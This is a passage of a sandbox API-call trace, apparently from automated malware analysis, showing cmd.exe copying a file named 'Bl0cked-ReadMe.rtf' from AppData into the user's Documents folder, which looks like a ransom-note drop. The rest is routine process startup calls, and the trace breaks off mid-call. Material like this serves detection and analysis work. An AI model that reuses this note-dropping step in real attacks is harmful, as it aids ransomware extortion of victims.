= "" Region: id = 35688 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 35689 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 35690 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 886 os_tid = 0xc00 [0236.092] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7c4 | out: lpSystemTimeAsFileTime=0x2ef7c4*(dwLowDateTime=0xc02f0280, dwHighDateTime=0x1d440a9)) [0236.092] GetCurrentProcessId () returned 0xaac [0236.092] GetCurrentThreadId () returned 0xc00 [0236.092] GetTickCount () returned 0x40cbc [0236.092] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef7bc | out: lpPerformanceCount=0x2ef7bc*=29288126219) returned 1 [0236.093] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0236.093] __set_app_type (_Type=0x1) [0236.093] __p__fmode () returned 0x76b331f4 [0236.093] __p__commode () returned 0x76b331fc [0236.093] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0236.093] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0236.093] GetCurrentThreadId () returned 0xc00 [0236.093] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc00) returned 0x38 [0236.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.093] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0236.093] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.094] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.094] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef754 | out: phkResult=0x2ef754*=0x0) returned 0x2 [0236.094] VirtualQuery (in: lpAddress=0x2ef78b, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0236.094] GetConsoleOutputCP () returned 0x1b5 [0236.094] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.094] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0236.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.094] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0236.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.095] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0236.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.095] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.095] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.095] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0236.096] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.096] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0236.100] GetEnvironmentStringsW () returned 0x450188* [0236.100] FreeEnvironmentStringsW (penv=0x450188) returned 1 [0236.101] GetEnvironmentStringsW () returned 0x450188* [0236.101] FreeEnvironmentStringsW (penv=0x450188) returned 1 [0236.101] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6c4 | out: phkResult=0x2ee6c4*=0x40) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0xb0, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegCloseKey (hKey=0x40) returned 0x0 [0236.101] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6c4 | out: phkResult=0x2ee6c4*=0x40) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegCloseKey (hKey=0x40) returned 0x0 [0236.101] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c3 [0236.101] srand (_Seed=0x5b8863c3) [0236.101] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"" [0236.101] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"" [0236.102] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.102] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4518e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0236.102] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.102] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.102] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.102] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0236.102] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0236.102] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0236.102] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0236.102] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0236.102] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0236.102] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0236.102] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0236.102] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0236.102] GetEnvironmentStringsW () returned 0x4522d8* [0236.102] FreeEnvironmentStringsW (penv=0x4522d8) returned 1 [0236.102] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.102] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.102] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0236.102] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0236.102] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0236.102] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0236.103] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0236.103] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0236.103] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0236.103] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0236.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef490 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.103] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef490, lpFilePart=0x2ef48c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef48c*="Desktop") returned 0x18 [0236.103] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.103] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c) returned 0x450018 [0236.103] FindClose (in: hFindFile=0x450018 | out: hFindFile=0x450018) returned 1 [0236.103] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c) returned 0x450018 [0236.103] FindClose (in: hFindFile=0x450018 | out: hFindFile=0x450018) returned 1 [0236.103] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c) returned 0x450018 [0236.103] FindClose (in: hFindFile=0x450018 | out: hFindFile=0x450018) returned 1 [0236.103] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.103] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0236.103] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0236.104] GetEnvironmentStringsW () returned 0x452af8* [0236.104] FreeEnvironmentStringsW (penv=0x452af8) returned 1 [0236.104] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.104] GetConsoleOutputCP () returned 0x1b5 [0236.106] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.106] GetUserDefaultLCID () returned 0x409 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="0") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="0") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="1") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0236.107] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0236.107] GetConsoleTitleW (in: lpConsoleTitle=0x4408e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.117] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.117] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0236.117] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0236.117] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0236.118] _wcsicmp (_String1="type", _String2=")") returned 75 [0236.118] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0236.118] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0236.118] _wcsicmp (_String1="IF", _String2="type") returned -11 [0236.118] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0236.118] _wcsicmp (_String1="REM", _String2="type") returned -2 [0236.118] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0236.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.123] GetFileType (hFile=0x7) returned 0x2 [0236.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0236.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef4c8 | out: lpMode=0x2ef4c8) returned 1 [0236.124] _dup (_FileHandle=1) returned 3 [0236.124] _close (_FileHandle=1) returned 0 [0236.124] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0236.125] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\myshap~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef498, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0236.126] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0236.126] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.126] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0236.126] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0236.126] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0236.126] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0236.127] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.127] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2eee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eee2c) returned 0x440e78 [0236.127] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0236.127] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0236.127] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0236.127] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2edd38, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0236.127] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0236.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.127] GetFileType (hFile=0x54) returned 0x1 [0236.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.127] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2edd90 | out: lpFileSizeHigh=0x2edd90*=0x0) returned 0x1632 [0236.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.127] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.128] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.128] GetFileType (hFile=0x4c) returned 0x1 [0236.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.128] GetFileType (hFile=0x4c) returned 0x1 [0236.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.128] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.130] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, 